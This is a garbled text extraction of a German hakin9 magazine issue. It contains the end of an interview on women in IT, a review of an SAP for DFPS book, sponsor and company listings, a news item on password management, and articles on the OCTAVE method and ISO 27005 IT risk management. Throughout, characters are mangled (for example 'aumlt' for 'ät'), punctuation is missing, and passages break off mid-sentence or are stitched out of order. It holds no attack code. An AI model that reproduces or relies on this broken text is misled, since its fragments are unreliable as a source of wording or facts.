hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
10201028
ABWEHR
ment eingebettet welches nach einem act Zyklus arbeitet (vergl Abb 4)
Die Organisation sollte in periodischen Abstaumlnden ihre ermittelte Baseline zuruumlcksetzen indem eine nochmalige Risikoanalyse durchgefuumlhrt wird Diese Zeitspanne kann vorgegeben werden oder von wich-tigen Ereignissen wie zB eine Restrukturierungs-maszlignahme der zB Netzwerkinfrastruktur uvm an-gestoszligen werden Zwischen den Analysen kann die Organisation periodisch neue Risiken identifizieren analysieren und in Relation zu bereits existieren-den Risiken Risiko reduzierende Maszlignahmen entwi-ckeln
Da die Risikoanalyse nur einen Teil des Risikoma-nagements darstellt ist die OCTAVE Methode mit ih-rer offenen Schnittstelle hervorragend geeignet um als bdquoBest Practiceldquo-Grundlage die ISO 27001 Norm zu im-
plementieren und in der Umsetzungsphase den COBIT 40 Standard zu verwenden
OCTAVE bildet die Grundlage der in der ISO 27001
trachtungsbereiches feststellen von kritischen Orga-nisationswerten qualitative und eventuell quantitative Betrachtung von Risiken Entwicklung von entspre-chenden Kontrollmaszlignahmen um Risiken zu minimie-ren oder aber auch zu akzeptieren Anschlieszligend kann man unter Zuhilfenahme von COBIT die der ISO Norm zugeschriebenen Kontrollen implementieren Man kann somit die IT Sicherheitsstrategie der betrachteten Organisation mit einer Risikoanalyse nach dem OCTA-VE Ansatz und dem standardisierten Reifegrad-Modell nach COBIT - gepruumlft nach ISO 27001 - auswerten und umsetzen (Verg Abb 5)
Abbildung 5 Mapping auf ISO 27001
Mehr Informationenwwwcertorgoctave
wwwisacaorgwwwstandards-onlinenetInformationSecurity-
Standardhtm
MAG HELMUT KAUFMANN MSCDozent an der Fachhochschule St Poumllten und ua taumltig im Be-reich Secure Data Center Management Cloud Computing Di-saster Recovery and Business Continuity Fraud Detection
News
hakin9orgde 29
Tausende Passwoumlrter von Usern und Administratoren sind im UmlaufMan stelle sich komplexe IT Landschaften vor die geo-
grafisch verteilt sind und viele Mitarbeiter die in verschie-
dene bdquoRollenldquo schluumlpfen Eine Buchhalterin hat nicht nur
Zugang zu standardisierten Anwendungen sondern auch
zum Internetbanking der FIBU Software und anderen
kaufmaumlnnischen Programmen wie SAP Interessant und
zunehmend komplex wird es bei den IT Administratoren
Natuumlrlich koumlnnen sich diese von vielen fuumlr ihre mathema-
tischen Faumlhigkeiten bewunderten auch nicht dutzende
von Passwoumlrtern merken sondern helfen etwas nach Pro
Anwendung wird ein Passwort vergeben das sich diese
dann fuumlr laumlngere Zeit im Gedaumlchtnis behalten Mit dieser
Feststellung wird die gesamte Problematik sofort offenbar
ohne in technische Details gehen zu muumlssen ein Pass-
wort fuumlr laumlngere Zeit im Gedaumlchtnis
Guter Rat ist teuer - und umsonstRichtlinien zur Passwortgestaltung gibt es unzaumlhlige und
viele sind gut gemeint Die Laumlnge wird vorgegeben und
auch die zu verwendenden Zeichen die alle 4 Wochen
zu aumlndern sind und natuumlrlich nicht auf einem Post-It unter
der Tastatur kleben sollen Selbst wenn dies eingehal-
ten wird vergisst man sein neues Passwort spaumltestens
wenn man 2 Wochen auf Urlaub war und auch der Help-
Desk freut sich dass man wieder zuruumlck ist Auch der
Auditor ist zumindest milde gestimmt wenn die zentralen
Passwoumlrter zumindest in einer gesicherten Excel Liste
zusammengefasst sind Von IT Security sollte man aber
dabei besser nicht sprechen da jeder Administrator auf
alle Passwoumlrter zugreifen kann Spaumltestens bei automa-
tisierten (unattended) Passwoumlrtern die via Skript fixiert
sind und auf eine Anwendung oder Datenbank zugreifen
sind verhaltensorientierte Ansaumltze obsolete
Passwortstruktur ist unbekanntKaum ein IT Verantwortlicher hat verlaumlssliche Informa-
tionen uumlber die Strukturen und Verbreitungsgrade von
Passwoumlrtern in einer Organisation Bei Implementie-
rung eines automatisierten Passwort-Managements
wird oft erst festgestellt dass zehntausende privilegier-
te Administratorkonten vorhanden sind aber nur 20
davon als Administratorkonten dienen Der uumlberwiegen-
de Teil der Passwoumlrter sind Application-to-Application
(A2A) und Application-to-Database (A2D) Konten die
in Skripts den Zugriff ermoumlglichen Und natuumlrlich nur in
seltensten Faumlllen geaumlndert werden und somit immer ei-
ne Hintertuumlre auch fuumlr den Ex-Mitarbeiter offenlassen
Die Passwort Autoritaumlt Freiwilligkeit und Empfehlungen sind nicht angebracht Die Zugangsberechtigungen sind als Schluumlssel fuumlr Safes
mit allen Geheimnissen der Organisation anzusehen Das
Ergebnis einer Reflektion der Problematik bdquoPasswoumlrterldquo
kann nur sein dass ein automatisiertes und auditierbares
Software-Werkzeug in Frage kommen kann Die Durchset-
zung der Passwoumlrter Policies Zuteilung von Einmal-Pass-
woumlrtern und vor allem eine sichere Authentifizierung und
Ablage dieser ist natuumlrlich ebenso ein Must-Have In Zeiten
wie diesen sollte es auf Knopfdruck moumlglich sein einen Ad-
ministrator zu sperren oder zeitlich begrenzte Passwoumlrter
fuumlr externe Dienstleister ausstellen zu koumlnnen
Antares NetlogiX empfiehlt nach eingehender Analy-
se - des sehr uumlberschaubaren Marktes - die Loumlsung
bdquoCloakware Password Authorityldquo Die ersten erfolgrei-
chen Referenzprojekte und Kundenmeinungen haben
diese Meinung weiter verstaumlrkt
Wetten dass Ihr groumlszligtes Betriebsgeheimnis ungeschuumltzt istWie ein schlechter Sickerwitz stellt man sich zuerst die Frage was ist unser groumlszligtes Betriebsgeheimnis Die Kundenlisten die Projektdokumentationen und Strategiepapiere die Zahlen auf den Bankkonten oder gar die private Telefonnummer vom Vorstandsvorsitzenden Schlussendlich sind es die Passwoumlrter und Zugangsberechtigungen auf saumlmtliche Anwendungen und Datenbanken in jedem Unternehmen oder Organisation
10201030
ABWEHR
In der heutigen Ausgabe werde ich Ihnen darstellen warum es nuumltzlich ist sich mit dem Risikomanage-ment der IT zu beschaumlftigen und dabei auf das Mo-
dell der ISO 27005 zuruumlck zu greifenAuf dieses Thema wurde bereits in einer fruumlheren
Ausgabe eingegangen in diesem Artikel wird aber mehr auf die Norm und den eigentlichen Prozess mit den einzelnen Schritten eingegangen
Groumlszligere Unternehmen sind schon von Gesetz her verpflichtet sich mit dem Themenbereich Risiko-management zu beschaumlftigen (Aktiengesetz Kon-TraG GmbH-Gesetz uAuml) Ein Teil dieses Risikoma-nagements ist das IT-Risikomanagement welches sich ndash wie der Name es schon sagt ndash mit den Risi-ken im IT-Bereich beschaumlftigt Eine Problematik beim Risikomanagement allgemein und speziell bei der
IT-Risikomanagement ndash Wozu brauche ich das
In der letzten Ausgabe habe ich Ihnen ausfuumlhrlich die Norm ISOIEC 27001 vorgestellt und einen kurzen Einblick in die 27000-Familie gegeben Ein Teil dieser Familie ist die ISO 27005 die sich mit dem IT-Risikomanagement befasst
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men
IEC 27001)
Andreas Lentwojt
Abbildung 1 Aufbau eines Risikomanagementsystems (allgemein)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 31
entgegenwirkt Richtlinien wie Basel II oder Euro-SOX fordern diese Ausrichtung seit langem
Die ISO 27005 ist branchen- und groumlszligenunabhaumlngig Somit koumlnnen auch kleinere und mittlere Unternehmen durch die Adaption der Inhalte auf die betrieblichen An-forderungen ein schlankes und effektives IT-Risikoma-nagement aufbauen Gerade sensible Branchen wie Automotive Healthcare Software oder Telekommuni-kation werden hier angesprochen Aufgrund aumlhnlicher Strukturen laumlsst sich die ISO 27005 ohne groumlszligeren Auf-wand in ein unternehmensweites Risikomanagement integrieren kann aber auch raquosololaquo umgesetzt werden Im Gegensatz zur ISOIEC 27001 ist die ISOIEC 27005 selbst nicht zertifizierbar
Kapitel 1 ndash Risikomanagementsystem allgemeinWie bei der ISO 27001 geht es auch bei der ISO 27005 nicht um das bdquowasldquo sondern um das bdquowieldquo Es ist ein Leitfaden zur Implementierung eines Risikoprozesses im Kontext der Informations- und Telekommunikations-technologie Wie sieht so ein Risikoprozess nun aus Ganz allgemein betrachtet geht es wiederum um ein Managementsystem welches aus 6 Schritten (vergl Abb 1) besteht
Informationstechnologie ist die Bewertung der er-kannten Risiken Bereits seit einigen Jahren gab es nationale Normen die sich mit einem standardisier-ten Vorgehensmodell beschaumlftigten Im Juni 2008 wurde daraus die international anerkannte Norm ISOIEC 270052008 (ehem BS 7799-32006) ISO 270052008 ist eine spezielle Auspraumlgung der ISOIEC 310002009 die sich mit dem Risikomanagement all-gemein befasst Die genauen Bezeichnungen lauten
les and guidelinesldquo
nagementldquo
Warum uumlberhaupt ein IT-Risikomanagementsystem im Unternehmens-Kontext
Datenverlust und -diebstahl gehoumlren zu den groumlszligten Problemen in Unternehmen Bisher bezog sich Risiko-management in Unternehmen hauptsaumlchlich auf Markt- und Adressrisiken sowie auf finanzielle Risikofaktoren Das Risikomanagement im IT-Bereich wurde weitgehend vernachlaumlssigt Dabei lassen sich Sicherheitsluumlcken mit-tels Risikomanagement aufdecken und minimieren was auch Regressforderungen an die Unternehmensfuumlhrung
Abbildung 2 Aufbau der ISO 270052008
10201032
ABWEHR
Kapitel 2 ndash Der Standard ISOIEC 270052008Die ISO 27005 stellt eine Anleitung zur IT Risikoanaly-se und zum Risikomanagement im IT Bereich dar Sie beinhaltet dabei einerseits eine Beschreibung des kom-pletten Risikomanagementprozesses als Ganzes und andererseits eine genaue Beschreibung der einzelnen Schritte des Risikomanagementprozesses und der Ri-sikoanalyse Die Anhaumlnge der IEC 27005 liefern zudem nuumltzliche Informationen zur Implementierung eines Ri-sikomanagementsystems im Bereich Informationssi-
Norm ISO 27001
gen auf bedrohte Werte direkte und indirekte Be-drohungen und Schwachstellen
schaumltzung der Risikowahrscheinlichkeit und des Ri-sikoniveaus
managementmaszlignahmen
Aus diesen einzelnen Kapiteln der Norm wird der IT-Sicherheitsprozess entwickelt (vergl Abb 3)
Kapitel 3 ndash Die Phasen
Defi nition der RahmenbedingungenIn einem ersten Schritt wird in einer Schutzbedarfsfest-stellung (High Level Risk Analysis) der Schutzbedarf fuumlr
Schutzbedarfskategorie niedrig bis hoch wird idR auf eine detaillierte Risikoanalyse verzichtet Dies erlaubt ei-ne schnelle und effektive Auswahl von grundlegenden Sicherheitsmaszlignahmen bei gleichzeitiger Gewaumlhrleis-tung eines angemessenen Schutzniveaus IT-Systeme der Schutzbedarfskategorie bdquosehr hoch sind einer de-taillierten Risikoanalyse zu unterziehen auf deren Basis individuelle Sicherheitsmaszlignahmen ausgewaumlhlt werden
Abbildung 3 Der Sicherheitsprozess gem ISO 270052008
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 33
Diese Option kombiniert die Vorteile des Grund-schutz- und des Risikoanalyseansatzes da alle IT-Systeme mit hohem Schutzbedarf wirksam und ange-messen geschuumltzt werden Maszlignahmen koumlnnen fuumlr die anderen Systeme mit Hilfe des Grundschutzes schnell und effektiv ausgewaumlhlt werden Diese Methode stellt in den meisten Einsatzumgebungen eine empfehlenswer-te Strategie zur Risikoanalyse dar
Zu den einzelnen Kriterien die festgelegt werden muumlssen gehoumlren ua
RisikobewertungDie Risikobewertung gliedert sich in die beiden Vor-gaumlnge Risikoanalyse und der Priorisierung der Risiken Die Risikoanalyse ist sicherlich der schwierigste und aufwendigste Teil muumlssen doch zunaumlchst die Risiken
-setsldquo des Unternehmens wird folgender Prozess durch-laufen
Dieser Prozess wird fuumlr alle Assets wiederholt Ein As-set im Sinne der ISO 27005 ist alles was einen Wert fuumlr die Organisation besitzt und daher schuumltzenswert
Rahmenbedingungen den zu betrachtenden Rahmen zunaumlchst eng zu fassen Er kann spaumlter immer noch erweitert werden Die Norm unterteilt hierbei in primauml-re Assets (Geschaumlftsprozesse und ndashaktivitaumlten Infor-mationen) und unterstuumltzende Assets (Hard- und Soft-ware Netzwerk Personal Infrastruktur etc) Eine de-
NormAus dem beschriebenen Prozess erfolgt eine Analyse
und Auflistung der Konsequenzen und letztendlich eine Risikoeinschaumltzung
--
wertung nach Zeitwert nach Wiederbeschaffungswert nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Ver-lust des Assets Immaterielle Werte werden idR nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Verlust des As-sets bewertet Bei der Bewertung ist zu beachten dass Wertekombinationen haumlufig nicht der Summe der Einzel-
werte entsprechen da sich die Werte in Kombination er-gaumlnzen und einen houmlheren Wert darstellen
Die zu schuumltzenden Werte sind vielfaumlltigen Be-drohungen ausgesetzt Im Rahmen der Risikoana-lyse ist nun die Eintrittswahrscheinlichkeit abzu-schaumltzen
Bedrohungen sind charakterisiert durch
-vorteile Rache)
-hung verursacht werden kann
-ben Blitzschlag ) liegen statistische Daten vor die fuumlr die Einschaumltzung hilfreich sein koumlnnen
Die Bedrohungsanalyse umfasst im Einzelnen
Bedrohungen koumlnnen unterteilt werden in
-sonalausfall)
-chende Dokumentation)
-nutzung oder -administration Nichtbeachtung von Sicherheitsmaszlignahmen)
-tentraumlger)
von Geraumlten Manipulation an Daten oder Software Viren trojanische Pferde)
Es ist wichtig alle wesentlichen Bedrohungen zu er-fassen da andernfalls Sicherheitsluumlcken bestehen bleiben koumlnnen Im Anhang C der Norm ist eine um-fangreiche Listung von Bedrohungen vorhanden je-doch kann keine derartige Liste vollstaumlndig sein Da-ruumlber hinaus sind auch Bedrohungen einem staumlndigen Wandel und einer staumlndigen Weiterentwicklung unter-worfen
Nachdem Werte und Bedrohungen erfasst wurden muss nun die Eintrittswahrscheinlichkeit zugeordnet werden Es ist also zu bestimmen mit welcher Wahr-scheinlichkeit eine Bedrohung im betrachteten Umfeld eintreten wird
Auch die Eintrittswahrscheinlichkeit kann quantita-tiv oder qualitativ bewertet werden Da eine quantita-
-taumluschen koumlnnte ist in den letzten Jahren ein Trend in Richtung qualitativer Bewertung zu erkennen
10201034
ABWEHR
Bewaumlhrt haben sich hier etwa drei- bis fuumlnfteilige Ska-len (zB 4 sehr haumlufig hellip 0 sehr selten)
Diese allgemeinen Bedeutungen der Skalenwerte koumlnnen fuumlr jeden einzelnen spezifischen Anwendungs-bereich konkretisiert werden
Nachdem Werte Bedrohungen und Eintrittswahr-scheinlichkeiten definiert sind wird eine Schwachstellen-analyse durchgefuumlhrt Unter einer Schwachstelle (Vulne-rability) versteht man eine Sicherheitsschwaumlche eines oder mehrerer Objekte die durch eine Bedrohung ausge-nuumltzt werden kann Eine Schwachstelle selbst verursacht noch keinen Schaden sie ist aber die Voraussetzung die es einer Bedrohung ermoumlglicht wirksam zu werden Typische Beispiele fuumlr Schwachstellen sind etwa
Mangelnder baulicher Schutz von Raumlumen mit IT-Ein-richtungen
heitsbewusstsein
Sicherheitsschwaumlchen und muss sowohl das Umfeld als auch bereits vorhandene Schutzmaszlignahmen mit einbeziehen Es ist wichtig jede Schwachstelle da-raufhin zu bewerten wie leicht es ist sie auszunutzen
Vor der eigentlichen Risikobewertung werden noch die bestehenden Sicherheitsmaszlignahmen betrachtet und bewertet Stellt sich heraus dass eine bereits exis-tierende oder geplante Maszlignahme ihren Anforderun-gen nicht gerecht wird so ist zu pruumlfen ob sie ersatz-los entfernt durch andere Maszlignahmen ersetzt oder aus Kostengruumlnden belassen werden soll
Im Rahmen dieses Schrittes sollte auch gepruumlft wer-den ob die bereits existierenden Sicherheitsmaszlignah-
staumlndig eingesetzte Sicherheitsmaszlignahmen stellen eine zusaumltzliche potentielle Schwachstelle eines Systems dar
Die eigentliche Risikobewertung ist nun das Zusammen-fuumlhren der in den vorherigen Abschnitten beschriebenen Maszlignahmen und die Erstellung einer Risikomatrix (vergl Abb 4) Darin werden die bewerteten Risiken gemaumlszlig ihres Risikopotenzials in einer Matrix angeordnet und dem ge-wuumlnschten SOLL gegenuumlber gestellt Im Anhang der Norm befinden sich einige Beispiele fuumlr eine Risikobewertung
Anhand der Risikomatrix erfolgt die Priorisierung der Risiken in Abhaumlngigkeit des zur Verfuumlgung stehenden Budgets und der Ressourcen
RisikobehandlungDie Phase der Risikobehandlung ist das bdquotaumlgliche Tunldquo
